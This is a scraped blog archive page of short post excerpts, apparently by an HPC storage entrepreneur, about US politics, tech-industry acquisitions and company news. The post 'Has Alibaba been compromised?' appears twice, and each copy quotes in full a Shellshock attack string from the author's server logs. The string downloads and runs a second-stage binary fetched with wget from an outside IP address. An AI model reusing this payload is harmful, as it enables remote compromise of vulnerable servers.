Lets see if this actually materializes. Its pretty obvious as to how hard the media folks tried to spin this with the title. A good rubric for how the US media treats the president and his opposition could be found in this cartoon. With that in mind, read the title of that article, and then note this little tidbit on the inside:
Notice the scare quotes around the word treason. Treason has a very straighforward definition in the US Constitution.
Posts
You get what you vote for
This is sad.
Here’s the really sad parts of this
Not only did they close the parks, but they turned off the web sites The park employees are being ordered to make life as hard as possible for the patrons. None of this had to happen. Had the democrats decided that, ya know, in a political environment where negotiation is the key to advancing agendas, and not a burnt ground strategy, chances are they would be able to get some of what they wanted.
Posts
Part of the reason why Detroit has a long rough road ahead
is due, in significant part, to bad law and bad policy enshrined in law. Ideological view points are hard coded in the firmware of Michigan. Which allows lawsuits and results such as this. It cannot be overemphasized how bone-headed this particular law is. That one can never, under any circumstances, reduce pensioner benefit values. This means, if you ever struck a bad deal, like Detroit, and many others in Michigan have, you have no choice but to continue this bad deal for eternity.
Posts
... and bang goes Detroit ...
This brings me no joy. I went to grad school in Detroit. I like this city. It has character, it has guts, it has potential. It also has no cash to continue operations. And that sucks. Detroit filed for chapter 9 bankruptcy a few hours ago. There are many reasons for this, but there are a number of specific ones, that are generalizable to businesses as well. First, population decline has led to a tax revenue decline.
Posts
You can't make this stuff up, 10-June-2013 edition
Link here. Don’t want to tax ALL businesses … out of business? Just some of them? Are you mad? Are you freaking kidding me? Pulling my leg? Very sad. Very very sad. The government should be seeking to reduce taxes to make sure businesses grow, and hire, and spend. Mr. President, the entire role of government in business should be to get out of the way, lest you slow down growth, employment, and spending.
Posts
Do we really have enough native STEM workers in the US?
Yes, actually we do. Too many. Turns out that little law of supply and demand does in fact hold true. The higher the demand for something in limited supply, the higher the price (wages) you will pay for it. By applying forces to this law, you impact a number of outcomes. That is, if you start monkeying around with the supply, sure, you can adjust the price you pay for the STEM.
Posts
This will not end well
Watching the slow motion train wreck in Cyprus made me wonder exactly whom the target of the money grab was. And more importatly, whether or not the people making demands had any clue that their victory was, at best, Pyrrhic, and at worst, a serious contagion. Any financial system in operation is built upon various levels of trust, implicitly in the case of the least risky capital storage system. You know that you can trust, within reasonable expectations and parameters, that capital that you deposit there can be retrieved later.
Posts
Will the US default soon?
Quite possibly. We have a toxic mixture of overspending, insufficient revenue to cover the spending, and a borrowing limit. Several ideas have been floated over the last few weeks, including minting a $1T USD coin and depositing in the federal reserve. Thats $1012 USD folks. This is sort of like quantitative easing, aka printing more money, but far far worse. Anyone whom has ever been early into a startup and watched the value of their options get diluted with each new capital infusion knows exactly what this is.
Posts
1 January 2013 : its over the cliff we go!
[update] This pretty much says it all. [update 2] … and … they … fold. A bad deal, about to be voted into law. As they said, elections have consequences. Whatever happens, they (WH and Senate) now own it. No cuts, just taxes. Even though our problem is way too much spending and mis-targeted tax increases.
Less than 10 hours into the new year for us here in GMT-5. There is some aspect of humanity whereby many view this as a hopeful time, a chance to “begin anew”.
Posts
Going over the (US fiscal) cliff
[update] There’sa good piece on the impact upon the potential negotiations and its impact upon one party. As I noted below, any deal done between 1-Jan and now will be a bad deal. The only way to get real spending cuts is to go over the cliff, so lets do this. I don’t care about the political fortunes impact. I care about the long term impact upon the country of out of control spending.
Posts
On the dangers of economic prognostication, and presidential elections
is drinking your own koolaid, consuming your own product, believing the wishful thinking that underlies your most serious predictions. Like this. Just like in catastrophic AGW, there’s one single chart that belies all the claims as to how “well” the “stimulus” package did. Its a damning chart. Here it is.
[ ](http://www.aei-ideas.org/2012/11/is-this-as-good-as-it-gets-novembers-dismal-new-normal-jobs-report/)
And worse, if you look at how the recovery compares to others … its not going very well at all.
Posts
Interesting post on macroeconomic trends, risk, investment, and farms
Saw this linked on from zerohedge. Understand that, to a degree, this is a sales pitch for this persons' new fund. But the reasoning behind doing what they are doing is fascinating to me. Along with a description of what happened to the global financial markets.
Definitely worth the view just for the history and an analysis of macroeconomic trends.
Posts
Interesting and depressing article on Michigan's future
A few prefaces … First, I disagree with the premise throughout this article that our governor is timid. He is, IMO, and in many people’s opinion, doing a great job. Governor Romney is very similar to Governor Snyder in many ways. Timidity really isn’t apparent. I guess that people see someone making a cost-benefit analysis for engaging in a particular debate, or pushing for a particular outcome, and deciding to forgo a particular fight, as being timid.
Posts
Beautiful smackdown
This is epic. As originally seen on @mndoci ’s twitter stream. Short version: Those who don’t have a clue, really … REALLY … shouldn’t write lengthy journal articles about what they don’t have a clue about. Lest they get smacked down. Like this. For some reason, its an article of faith for many people, who largely do not understand why, that the big drug companies are EEEEVVIIIILLL (hope I used enough I’s there).
Category: entertainment
Posts
Typecasting and the "trust us" factor
Finding myself on the other side of the table in the consumer-vendor relationship has resulted in some eye opening experiences. These are things I look back on, and realize that I strenuously avoided doing during my Scalable days. But I see everyone doing it now, as they try to sell me stuff, or convince me to use things. One of the eye opening things is a bit of typecasting of sorts.
Posts
Ten years ago this blog was born
This was my first post. On 12-October-2005. I’ve written about many things over the past decade. 2000 plus posts, 200 per year, averages about 4 every 7 days or so. I’ve slowed down a bit in recent months, as work has grown more intense, but there are many thoughts I want to get down. To a large extent, my journey through HPC has been an interesting one, and only slightly captured in these posts.
Posts
Voting in HPCWire's readers choice awards are open, please vote!
Our friends at Lucera are in number 6 for best use of HPC in a financial services category. Our Unison product is at number 11 for Best HPC Storage Product or Technology. And I did a write in for #21 for us :D. Our friends at Mellanox have their 100Gb EDR Infiniband technology at number 14. Please do vote (early, not often).
Posts
Has Alibaba been compromised?
I saw this attack in the day job’s web server logs today. From IP address 198.11.176.82, which appears to point back to Alibaba. This doesn’t mean anything in and of itself, until we look at the payload.
()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;echo%20wget%20http://115.28.231.237:999/htrdps%20-O%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20echo%20By%20China.Z%20%3E%3E%20/tmp/Run.sh;echo%20chmod%20777%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20rm%20-rf%20/tmp/Run.sh%20%3E%3E%20/tmp/Run.sh;chmod%20777%20/tmp/Run.sh;/tmp/Run.sh/x22 This appears to be an attempt to exploit a bash hole. What is interesting is the IP address to pull the second stage payload from. Run a whois against that … I’ll wait.
Posts
Nails it !!!
Dave Barry in his usual fine form … summarizes our year. The one take away should be … WHAP
Category: entrepreneur
Posts
Opening keynote @Supercomputing #SC18 : #HPC is an enabling technology ...
… Ok, the speaker said far more than that. But one of his central theses is that in this “second” machine revolution, we are enabling data driven decision making, distributed decision and consensus, as well as expanding beyond the confines of specific expertise in a field. The latter I’ve heard described as cross fertilization … gather a bunch of smart people “together” and give them a problem spec. Let them run with it.
Posts
#HPC in all the things
I read this announcement this morning. Our friends at Facebook releasing their reduced precision server side convolution and GEMM operations.
Many years ago, I tried to convince people that HPC moves both down market, into lower cost hardware, as well as more widely into more software toolchains. Basically, the decades of experience building very high performance applications and systems will have value downstream for many users over time.
GEMM is a generalized approach to a matrix multiply, which has been well optimized for HPC applications in various scientific libraries over time.
Posts
Looking forward to #SC18 next week and a discussion of all things #HPC
I’m attending SC18 next week. It’s been 3 years since I last attended (2015). Then we (@scalableinfo) had a large booth, lots of traffic, and showed off some of the first commercial NVMe high performance storage systems running BeeGFS over 100GbE.
I am looking forward to talking with as many people as I can, to get their perspectives on things. To see what they are thinking, hear what they are doing, and in which direction they are going.
Posts
Well ... that was fun
So … I’ve had this blog since 2005. I installed it from original sources. And WP made upgrades in the 2.x time frame, quite painless.
Or so it seemed.
Slowly, over time, some configuration/settings/whatever got out of whack. And with the last update, from a system originally installed in final form in 2013 or so, something broke.
I am not sure what. But the symptoms were simple … new posts would replace the most recent posts.
Posts
So I've got ideas for two businesses
Neither one is a computer related. Both are based upon what I see as unmet needs for various groups. One is a definitely “gotta have” for one group. The other group, there is one “solution” on the market that I looked at, and it’s pretty pathetic. The other uses technology where it should be using chemistry, as the tech is simply way too expensive for mass use, and quite inflexible. Both are B2C.
Posts
Oracle finally kills off Solaris and SPARC
This was making the rounds last week. Oracle seems to have a leak in its process, creating labels that trigger event notifications for people, for their packages. Solaris was decimated. More details at the links and at The Layoff. Honestly I had expected them to reach this point. I am guessing that they were contractually obligated for at least 7 years to provide Solaris/SPARC support to US government purchasers. SGI went through a similar thing with IRIX.
Posts
M&A and business things
First up, Tegile was acquired by Western Digital (WDC). This is in part due to WDC’s desire to be a one stop shop vertically integrated supplier for storage parts, systems, etc. This is how all of the storage parts OEMs needed to move, though Seagate failed to execute this correctly, selling off their array business in part to Cray. Toshiba … well … they have some existential challenges right now, and are about to sell off their profitable flash and memory systems business, if they can just get everyone to agree … This comes from the fact that spinning disk, while a venerable technology, has been effectively completely commoditized.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about vis-a-vis Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Enginio).
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk whom might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
Selling #HPC things on ebay
Given that the (now former) day job has ended, I am selling some of the old day job’s assets on ebay. We’ve sold some siFlash, Unison, and have current listings for Arista and Mellanox switches. More stuff will be listed in short order, check it out here. Feel free to reach out to me at joe.landman at the google mail thingy if you want to talk about any of these things, or buy before I list them.
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency * 45GBps read bandwidth * 15GBps write bandwidth * 7 million IOPS But then … a fibre connection.
Posts
Brings a smile to my face ... #BioIT #HPC accelerator
Way way back in the early aughts (2000’s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn’t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
A nice shout out in ComputerWeekly.com about @scalableinfo #HPC #storage
See the article here.
They mention Axellio, and on The Reg article on their ISE product, they say “X-IO partners using Axellio will be able to compete with DSSD, Mangstor and Zstor and offer what EMC has characterised as face-melting performance.” Hey, we were the first to come up with “face melting performance”. More than a year ago. And it really wasn’t us, but my buddy Dr. James Cuff of Harvard.
Posts
SSD/flash/memory shortage, day N+1
There has been a huge demand of SSD/Flash/memory components from a number of end users. Sadly not the day jobs customers … but enough to deplete the market of supply. Watching basic economics at work is fascinating. Supply is highly constrained, while demand is rising. Couple that with a (mis)expectation of continuous falling prices across the board leads to interesting conversations with customers. We’ve tried to set expectations appropriately, but we’ve been bitten in the past by doing just this.
Posts
ClusterHQ dies
ClusterHQ is now dead. They were an early container play, building a number of tools around Docker/etc. for the space. Containers are a step between bare metal and VMs. FLocker (ClusterHQ’s product) is open source, and they were looking to monetize it in a different way (not on acquisition, but on support). In this space though, Kubernetes reigns supreme. So competing products/projects need to adapt or outcompete. And its very hard to outcompete something like k8s.
Posts
M&A: Vertical integration plays
Two items of note here. First, Cavium acquires qlogic. This is interesting at some levels, as qlogic has been a long time player in storage (and networking). There are many qlogic FC switches out there, as well as some older Infiniband gear (pre-Intel sale). Cavium is more of a processor shop, having built a number of interesting SoC and general purpose CPUs. I am not sure the combo is going to be a serious contender to Intel or others in the data center space, but I think they will be working on carving out a specific niche.
Posts
Attempting, and to some degree, failing, to prevent a user from accruing technical debt
We strive to do right by our customers. Sometimes this involves telling them unpleasant truths about choices they are going to make in the future, or have made in the past. I try not to overly sugar coat things … I won’t be judgemental … but I will be frank, and sometimes, this doesn’t go over well. During these discussions, I often see people insisting that their goal is X, but the steps Y to get there, will lead them to Z, which is not coincident with X.
Posts
"No, really, we are different than all the others you worked with"
Thus ended the plaintive cry of a management consulting hawking their wares, promising us high level meetings with “customers” with “budgets” in our space. This isn’t to say we don’t want more customers, we do. We always need more (and repeat) customers … this is the nature of our business. What we don’t need is pay-for-play. There is no shared risk, no incentive for the management consultant to deliver a set of business, as they are being paid, and that … the pay for play, is their business.
Posts
VC landscape changing: Intel Capital on the market
Saw this in a post on VentureBeat. Intel Capital has been an important player in the space for a while. What happens next to them is worth paying attention to. They’ve been in the thick of many interesting companies, though usually outside of Intel’s core foci. Somewhat beyond the normal corporate strategic VC roles. This could change a number of things for startups … new and existing. VCs have been sitting on the sidelines, or being less active over the recent past, and this is likely not to help the situation.
Posts
"Unexpected" cloud storage retrieval charges, or "RTFM"
An article appeared on HN this morning. In it, the author noted that all was not well with the universe, as their backup, using Amazon’s Glacier product, wound up being quite expensive for a small backup/restore. The OP discovered some of the issues with Glacier when they began the restore (not commenting on performance, merely the costing). Basically, to lure you in, they provide very low up front costs. That is, until you try to pull the data back for some reason.
Posts
M&A: NetApp grabs SolidFire
This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline certainly with respect to dumb JBODs and smart “filer heads”. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.
Posts
There are no silver bullets, 2015 edition
In Feb 2013, I opined (with some measure of disgust) that people were looking at various software packages as silver bullets, these magical bits of a stack which could suddenly transform massive steaming piles of bits (big … uh … “data” ?) into golden nuggets of actionable data. Many of the “solutions” marketed these days are exactly like that … “add our magic bean software to your pipeline and you will gain insight faster.
Posts
Drama at Violin Memory
Violin has had a rather tumultuous time in market. Post IPO, they’ve not had a great time selling. They have an interesting product, but with SanDisk coming out with their kit, and many others in the competitive flash array space, this can’t be a fun time for them. They don’t have a large installed base to protect, and their competitors are numerous and fairly well funded. Add to the mix that, as a post-IPO public company, they no longer have the luxury of not hitting targets … they will get slaughtered in the market.
Posts
Scalable Informatics 13th year anniversary on Saturday
We started the company on 1-August-2002. I remember arguing with a senior VP at SGI over his decision to abandon linux clusters in Feb 2001. That was the catalyst for me leaving SGI, but I was too chicken to start Scalable then. I thought I could do better than them. I went to another place for 15 months or so. Tried jumpstarting an HPC group there … hired lots of folks, pursued lots of business.
Posts
Been there, done that, even have a patent on it
I just saw this about doing a divide and conquer approach to massive scale genomics calculation. While not specific to the code in question, it looked familiar. Yeah, I think I’ve seen something like this before … and wrote the code to do it. It was called SGI GenomeCluster. It was original and innovative at the time, hiding the massively parallel nature of the computation behind a comfortable interface that end users already knew.
Posts
M&A fallout: Cisco may have ditched Invicta after buying Whiptail
Article is here, take it as a rumor until we hear from them. My comments: First, M&A; is hard. You need a good fit product wise (little overlap and great complementary functions/capabilities), and a culture/people fit matter. Second, sales teams need to be on-board selling complete solutions involving the acquired tech. Sometimes this doesn’t happen, for any number of reasons, some fixable, some not. Third, Cisco is out of the storage game if this is true.
Posts
M&A or more correctly, acqui-hire: Cray bags much of Terascala
Terascala appears to have been disassembled, with much of the team going to Cray. Terascala started out selling internally developed storage appliances for Lustre. They developed deployment, monitoring, and management tools. Their UI was reasonably good. Then they struck up a deal with Dell and a few others. In doing so, they largely stopped their appliance sales. Put their code upon their partners hardware. This did generate more force multipliers for them in sales, but it cost them some of their differentiation … unless their boxes were entirely undifferentiated, where it would reduce their overall costs to avoid selling undifferentiated hardware.
Posts
Potential M&A: Micron being pursued
I was heads down all day yesterday working on a few things. Apparently this is widely known now, but I saw it late last night. Micron is being pursued by a group affiliated with Tsinghua University. There is a political angle to this group, as they are connected to the government through their management. Why is this interesting (the acquisition potential that is). Well, there are 4 basic Flash fabs out there these days.
Posts
M&A [RUMOR]: Cisco grabs Nutanix
[update] TL;DR this appears to be rumor/speculation. One would think that such an acquisition would be prominent on Nutanix’s web site. Its April fools, in May. /sigh
Huge in the hyperconverged space (which, not so curiously, is where the day job is), and its setting up the battle lines between the major software/hardware players. Cisco was already number 5 hardware vendor, and was bragging about “beating the white boxes”. The last may be more wishful thinking than reality.
Posts
Thoughts after a small capital raise
So the day job did a small capital raise. Not a huge amount, but helpful for some day to day stuff. We did this in part because a larger effort we were working on stalled for reasons I won’t go into here. Looking at where we are and where we need to be, I am amazed at the profound need for performance throughout the hyperconverged space, and blown away that we appear to be the only one focused upon it.
Posts
The worlds fastest hyper-converged appliance is faster and more affordable than ever
This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in an as minimal footprint … both rack based and cost wise … as possible. You can use these as independent stand alone units, integrate them into a larger FastPath Unison system We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl.
Posts
Interesting Q1 so far for day job
Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more. Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on.
Posts
Memory channel flash: is it over?
[full disclosure: day job has a relationship with Diablo] Russell just pointed this out to me. The short (pedestrian) version (I’ve got no information that is not public, so I can’t disclose something I don’t know anyway): Netlist filed a patent infringement suit against Diablo, and then included SanDisk as they bought Smart Storage, whom worked with Diablo prior to Smart being acquired by SanDisk. Netlist appears to have won an, at least temporary, injunction against Diablo.
Posts
M&A in our space
The day job’s products have never been stronger, fit together as well, or had as great a story arc as they do today. We can deliver denser, faster, easier to setup and manage systems quite easily. Our application stacks run atop this system on our ample computing power, and we provide massive network pipes in/out, as data motion is hard. Many more cool things are coming, but for now, we are working very hard on building something awesome.
Posts
Learning to respect my gut feelings again
A “gut feeling” is, at a deep level, a fundamental sense of something that you can’t necessarily ascribe metrics to, you can’t quantify exactly. Its not always right. Its a subconscious set of facts, ideas, concepts that seem to suggest something below the analytical portion of your mind, and it could bias you into a particular set of directions. Or you could take it as an aberration and go with “facts”.
Posts
M&A: PLX snarfed by ... Avago ?
Ok, didn’t see this acquirer coming, but PLX being bought … yeah, this makes sense. Avago looks like they are trying to become the glue between systems, whether the glue is a data storage fabric, or communications fabric, etc. PLX makes PCIe switches and other kit. PCIe switch and interconnection is the direction that many are converging to. Best end to end latencies, best per-lane performance, no protocol stack silliness to deal with.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there whom will tell you that its pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
Why not go Galt?
For those who don’t get the reference, “going Galt” points back to the masterpiece novel “Atlas Shrugged” by Ayn Rand. In it, one of the characters is named John Galt, and part of what he does, early in the novel, is convince those whom create jobs, and wealth in the country, to abandon their efforts, as the government lurches harder and farther to the redistributionist world view. Indeed, the country eventually goes full on socialist in the story, where people are not allowed to quit work, take a better job, and so forth.
Posts
Calxeda restructures
The day job had been talking to and working with Calxeda for a while. They’ve been undergoing some changes over the last few months as they worked to transition from an evangelist to a systems builder. The day job just got a note that they are restructuring. What this specifically means to an outsider, I am not sure, though I could speculate. HP has a vested interest in them. I wouldn’t be surprised to see a rapid asset acquisition.
Posts
Violin kicks out founding CEO
Story at The Register. Usually you give a CEO some time to right a listing ship. I pointed out in a recent post that there are some significant grumblings about Violin and in fact about most of the flash-as-rack-appliance space. I had noted
We’ve run into them a few times in competitive situations, so take what I write about them with an appropriate mass of NaCl. All the pure-play flash array vendors have to answer a basic question about their existence.
Posts
Oh dear lord
Lets see if this actually materializes. Its pretty obvious as to how hard the media folks tried to spin this with the title. A good rubric for how the US media treats the president and his opposition could be found in this cartoon. With that in mind, read the title of that article, and then note this little tidbit on the inside:
Notice the scare quotes around the word treason. Treason has a very straighforward definition in the US Constitution.
Posts
You get what you vote for
This is sad.
Here’s the really sad parts of this
Not only did they close the parks, but they turned off the web sites The park employees are being ordered to make life as hard as possible for the patrons. None of this had to happen. Had the democrats decided that, ya know, in a political environment where negotiation is the key to advancing agendas, and not a burnt ground strategy, chances are they would be able to get some of what they wanted.
Posts
Dead on correct article
What many of us worried about years ago was whether or not we weer electing an empty suit to the highest political office in the land. Someone with no experience running anything. With no great accomplishments upon which to build. Simply a moderate orator with a teleprompter. 5 years in, our worst fears don’t even appear to scratch the surface of the failure that we have brought upon ourselves. This piece at the Wall Street Journal is so completely spot on.
Posts
You can't make this stuff up, 10-June-2013 edition
Link here. Don’t want to tax ALL businesses … out of business? Just some of them? Are you mad? Are you freaking kidding me? Pulling my leg? Very sad. Very very sad. The government should be seeking to reduce taxes to make sure businesses grow, and hire, and spend. Mr. President, the entire role of government in business should be to get out of the way, lest you slow down growth, employment, and spending.
Posts
Don't know if I mentioned it, but the day job has a new website
Take a gander. Some things are missing, and our marketing folks are developing the content where needed, and revising it where we have existing content. Its quite refreshing to see this. It will get better over time. Its running in our facility now, and likely we’ll have a few clones in the cloud as well. But thats for later.
Posts
Do we really have enough native STEM workers in the US?
Yes, actually we do. Too many. Turns out that little law of supply and demand does in fact hold true. The higher the demand for something in limited supply, the higher the price (wages) you will pay for it. By applying forces to this law, you impact a number of outcomes. That is, if you start monkeying around with the supply, sure, you can adjust the price you pay for the STEM.
Posts
This will not end well
Watching the slow motion train wreck in Cyprus made me wonder exactly whom the target of the money grab was. And more importatly, whether or not the people making demands had any clue that their victory was, at best, Pyrrhic, and at worst, a serious contagion. Any financial system in operation is built upon various levels of trust, implicitly in the case of the least risky capital storage system. You know that you can trust, within reasonable expectations and parameters, that capital that you deposit there can be retrieved later.
Posts
The sequester is here
Suffice it to say that much hot air was blown over the sequester in the media. Really, there was much tearing of clothes over this. Much righteous indignation that someone in government, somewhere, would have to make (not so very hard) decisions about where to trim budgets. We needed this, as the US government is so completely broken as to no be able to propose a reasonable budget, pass a reasonable budget, nor listen to and work with ideas from other portions of the legislative branch which want to work on reasonable budgets.
Posts
... and the positions are now, finally open ...
See the Systems Engineering position here, and the System Build Technician position here. I’ll get these up on the InsideHPC.com site and a few others soon (tomorrow). But they are open now. For the Systems Engineering position, we really need someone in NYC area with a strong financial services background … Doug made me take out the “able to leap tall buildings in a single bound” line, as well as the “must be able to talk customers through complex vi sessions on system configuration files while driving 70 mph on a highway.
Posts
Going over the (US fiscal) cliff
[update] There’sa good piece on the impact upon the potential negotiations and its impact upon one party. As I noted below, any deal done between 1-Jan and now will be a bad deal. The only way to get real spending cuts is to go over the cliff, so lets do this. I don’t care about the political fortunes impact. I care about the long term impact upon the country of out of control spending.
Posts
On the dangers of economic prognostication, and presidential elections
is drinking your own koolaid, consuming your own product, believing the wishful thinking that underlies your most serious predictions. Like this. Just like in catastrophic AGW, there’s one single chart that belies all the claims as to how “well” the “stimulus” package did. Its a damning chart. Here it is.
[ ](http://www.aei-ideas.org/2012/11/is-this-as-good-as-it-gets-novembers-dismal-new-normal-jobs-report/)
And worse, if you look at how the recovery compares to others … its not going very well at all.
Posts
Interesting and depressing article on Michigan's future
A few prefaces … First, I disagree with the premise throughout this article that our governor is timid. He is, IMO, and in many people’s opinion, doing a great job. Governor Romney is very similar to Governor Snyder in many ways. Timidity really isn’t apparent. I guess that people see someone making a cost-benefit analysis for engaging in a particular debate, or pushing for a particular outcome, and deciding to forgo a particular fight, as being timid.
Posts
Beautiful smackdown
This is epic. As originally seen on @mndoci ’s twitter stream. Short version: Those who don’t have a clue, really … REALLY … shouldn’t write lengthy journal articles about what they don’t have a clue about. Lest they get smacked down. Like this. For some reason, its an article of faith for many people, who largely do not understand why, that the big drug companies are EEEEVVIIIILLL (hope I used enough I’s there).
Posts
We built that: 10 years in business
[warning: longer post] I mentioned this on twitter (@sijoe). The day job has been in business for 10 years. We’ve not taken outside investment to date, and we’ve not sold the company yet. We’ve been profitable and growing continuously during our lifetime. The preceding 3 years have seen growth, accelerating hard. The company was built starting with a conviction that practitioners and users of HPC systems needed better designs, better systems than were being pushed out by traditional vendors in the early 2000’s.
Posts
hits bottom, digs deeper
[update] below the fold and video. I can only conclude at this point that the “don’t get it” disease runs deep and wide in this administration. [update 2] This at the WSJ encapsulates what we are observing. This has gone beyond painful to watch to embarrassing. The president now claims that his statements were sliced and diced. He now is saying that he believes that businesses built themselves, while claiming that his earlier statement was taken out of context.
Posts
why do people double down when they are wrong?
And do it again,
… sooooo …. a public works project (bridge, dam, …) is equivalent in his eyes to …. a risk an entrepreneur takes? Seriously?
Erp …. its glaringly obvious whom does not have an understanding. The worker in the private sector, punches the clock BECAUSE somewhere, somewhen, the entrepreneur had the idea, took the risk, entirely upon themselves, and built something. The “public sector” is a cost, something to be kept as small as possible so as not to drive those paying the public sectors bills, into the poor house.
Posts
How I'd like politicians to view entrepreneurs
Wonderful post by Jim Pethokoukis, covering a talk made by Ronald Reagan years ago.
and
I will freely admit that I was (almost) completely wrong in my original impressions of Reagan. I had a different political outlook in those days, and I had trouble viewing the guy as getting it. But get it, he did. This change in perception comes mostly from a maturing and a rethinking of my own world view.
Category: exercise
Posts
Three years
Its been 3 years to the day since I wrote this. As we’ve been doing before this happened, and after this happened, we are going to a TSO concert on the anniversary of the surgery. Its an affirmation of sorts. I can tell you that 3 years in, it has changed me in some fairly profound ways … I no longer take some things for granted. I try to spend more time with the family, do more things with them.
Posts
When you cross the rubicon
… from hobby and sport, to something more. I’ve traveled 1k miles for karate tournaments (to participate). I have not, as of yet, crossed an international border for one. That changes tomorrow. I went through a promotion test last week with an injured intercostal muscle. This caused all sorts of joy … no really … and had me think that I had a serious kidney stone flare up. The pain was in the same region, and toradol helped, which drew me to a rapid, and incorrect conclusion as to the pain.
Category: exploits
Posts
I don't agree with everything he wrote about systemd, but he isn't wrong on a fair amount of it
Systemd has taken the linux world by storm. Replacing 20-ish year old init style processing for a more legitimate control plane, and replacing it with a centralized resource to handle this control. There are many things to like within it, such as the granularity of control. But there are any number of things that are badly broken by default. Actually some of these things are specifically geared towards desktop users (which isn’t a bad thing if you are a desktop linux user, as I am).
Posts
Has Alibaba been compromised?
I saw this attack in the day job’s web server logs today. From IP address 198.11.176.82, which appears to point back to Alibaba. This doesn’t mean anything in and of itself, until we look at the payload.
()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;echo%20wget%20http://115.28.231.237:999/htrdps%20-O%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20echo%20By%20China.Z%20%3E%3E%20/tmp/Run.sh;echo%20chmod%20777%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20rm%20-rf%20/tmp/Run.sh%20%3E%3E%20/tmp/Run.sh;chmod%20777%20/tmp/Run.sh;/tmp/Run.sh/x22 This appears to be an attempt to exploit a bash hole. What is interesting is the IP address to pull the second stage payload from. Run a whois against that … I’ll wait.
Posts
Shellshock is worse than heartbleed
In part because, well, the patches don’t seem to cover all the exploits. For the gory details, look at the CVE list here. Then cut and paste the local exploits. Even with the latest patched source, built from scratch, there are active working compromises. With heartbleed, all we had to do was nuke keys, patch/update packages, restart machines, cross fingers. This is worse, in that the fixes … well … don’t.
Category: grids
Posts
OpenLDAP + sssd ... the simple guide
Ok. Here’s the problem. Small environment for customers, whom are not really sure what they want and need for authentication. Yes, they asked us to use local users for the machines. No, the number of users was not small. AD may or may not be in the picture. Ok, I am combining two sets of users with common problems here. In one case, they wanted manual installation of many users onto machines without permanent config files.
Posts
Been there, done that, even have a patent on it
I just saw this about doing a divide and conquer approach to massive scale genomics calculation. While not specific to the code in question, it looked familiar. Yeah, I think I’ve seen something like this before … and wrote the code to do it. It was called SGI GenomeCluster. It was original and innovative at the time, hiding the massively parallel nature of the computation behind a comfortable interface that end users already knew.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Inventory reduction @scalableinfo
Its that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
16-24 processor cores 128 GB RAM 48x {2,3,4} TB top mount drives 4x rear mount SSDs (OS/metadata cache) Scalable OS (Debian Wheezy based Linux OS) 3 year warranty As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
Update on IPMI Console Logger
